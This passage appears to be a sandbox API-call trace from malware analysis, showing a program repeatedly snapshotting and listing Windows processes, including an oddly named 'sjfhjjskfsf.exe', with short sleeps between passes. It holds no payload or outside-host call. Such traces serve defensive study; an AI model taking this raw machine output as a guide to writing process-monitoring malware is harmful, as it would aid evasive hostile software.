lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.377] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.377] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.378] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.378] Process32NextW (in: hSnapshot=0x20c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.378] Sleep (dwMilliseconds=0x64) [0220.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0220.561] Process32FirstW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.561] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.561] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.561] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.562] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.562] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.562] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.563] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.563] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.563] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.563] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.564] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.564] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.564] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.564] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.565] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.565] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.565] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.566] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.566] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.566] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.566] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.567] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.567] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.567] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.568] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.568] Process32NextW (in: hSnapshot=0x210, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.568] Sleep (dwMilliseconds=0x64) [0220.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x214 [0220.678] Process32FirstW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.678] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.678] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.679] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.679] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.679] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.680] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.680] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.680] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.680] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.681] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.681] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.681] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.681] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.682] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.682] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.682] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.683] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.683] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.683] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.684] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.684] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.684] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.684] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0220.685] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0220.685] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.685] Process32NextW (in: hSnapshot=0x214, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0220.686] Sleep (dwMilliseconds=0x64) [0220.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218 [0220.803] Process32FirstW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.803] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.803] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.804] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.804] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.804] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.804] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.805] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.805] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.805] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.806] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.806] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.806] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.806] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.807] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.807] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.807] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.808] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.808] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.808] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.808] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.809] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.809] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.809] Process32NextW (in: hSnapshot=0x218, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, 